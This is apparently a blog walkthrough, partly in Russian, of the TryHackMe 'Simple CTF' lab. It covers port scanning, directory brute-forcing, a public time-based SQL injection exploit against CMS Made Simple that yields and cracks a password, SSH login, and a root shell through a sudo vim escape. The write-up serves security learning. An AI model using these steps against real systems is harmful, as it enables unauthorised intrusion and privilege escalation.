Hi, my name is Vitalii Rudnykh 👋

Jun 19, 2022

📝 TryHackMe. Walkthrough: Simple CTF

How many services are running under port 1000?

$ nmap -A 10.10.203.52
PORT     STATE  SERVICE VERSION
21/tcp   open   ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
2222/tcp open   ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)

Ответ: *

What is running on the higher port?

Ответ: s**

What’s the CVE you’re using against the application?

Попробуем сбрутить директории на веб-сервере.

$ python3 dirsearch.py -u http://10.10.203.52/
...
[13:47:22] 200 -  929B  - /robots.txt
[13:47:26] 301 -  313B  - /simple  ->  http://10.10.203.52/simple/

В директории /simple/ находится веб-сайт, подпись внизу говорит что оно работает на CMS Make Simple version 2.2.8.

This site is powered by CMS Made Simple version 2.2.8

Пробуем найти доступные эксплоиты через searchsploit.

$ searchsploit 'cms made simple 2.2'
-------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                  |  Path
-------------------------------------------------------------------------------- ---------------------------------
CMS Made Simple 1.2.2 Module TinyMCE - SQL Injection                            | php/webapps/4810.txt
CMS Made Simple 2.2.14 - Arbitrary File Upload (Authenticated)                  | php/webapps/48779.py
CMS Made Simple 2.2.14 - Authenticated Arbitrary File Upload                    | php/webapps/48742.txt
CMS Made Simple 2.2.14 - Persistent Cross-Site Scripting (Authenticated)        | php/webapps/48851.txt
CMS Made Simple 2.2.15 - 'title' Cross-Site Scripting (XSS)                     | php/webapps/49793.txt
CMS Made Simple 2.2.15 - RCE (Authenticated)                                    | php/webapps/49345.txt
CMS Made Simple 2.2.15 - Stored Cross-Site Scripting via SVG File Upload (Authe | php/webapps/49199.txt
CMS Made Simple 2.2.5 - (Authenticated) Remote Code Execution                   | php/webapps/44976.py
CMS Made Simple 2.2.7 - (Authenticated) Remote Code Execution                   | php/webapps/45793.py
CMS Made Simple < 2.2.10 - SQL Injection                                        | php/webapps/46635.py

$ searchsploit -m 46635
  Exploit: CMS Made Simple < 2.2.10 - SQL Injection
      URL: https://www.exploit-db.com/exploits/46635
     Path: /usr/local/opt/exploitdb/share/exploitdb/exploits/php/webapps/46635.py
File Type: Python script text executable, ASCII text

Нам подходит SQLi.

Ответ: CVE-2019-****

To what kind of vulnerability is the application vulnerable?

Ответ: sq**

What’s the password?

$ python 46635.py
[+] Specify an url target
[+] Example usage (no cracking password): exploit.py -u http://target-uri
[+] Example usage (with cracking password): exploit.py -u http://target-uri --crack -w /path-wordlist
[+] Setup the variable TIME with an appropriate time, because this sql injection is a time based.

$ python 46635.py -u http://10.10.203.52/simple/ --crack -w password-list-all.txt
[+] Salt for password found: 1dac0d92e9fa6bb2
[+] Username found: mitch
[+] Email found: admin@admin.com
[+] Password found: 0c01f4468bd75d7a84c7eb73846e8d96
[+] Password cracked: secret

Where can you login with the details obtained?

Помимо админ-панели CMS, с этими доступами мы так же можем попробовать подключиться к SSH.

Ответ: s*h

What’s the user flag?

Прочитайте файл в домашней директории.

Ответ: ***d **b, ke** u*!

Is there any other user in the home directory? What’s its name?

ls -la /home/

Ответ: su****h

What can you leverage to spawn a privileged shell?

Проверим, какие у нас есть привелегии для sudo.

$ sudo --list
User mitch may run the following commands on Machine:
    (root) NOPASSWD: /usr/bin/vim

Ответ: **m

What’s the root flag?

Получаем рутовый шелл через sudo.

sudo vim -c ':!/bin/sh'

И читаем файл с флагом в директории /root/.

Ответ: W*** d***. **u **** ***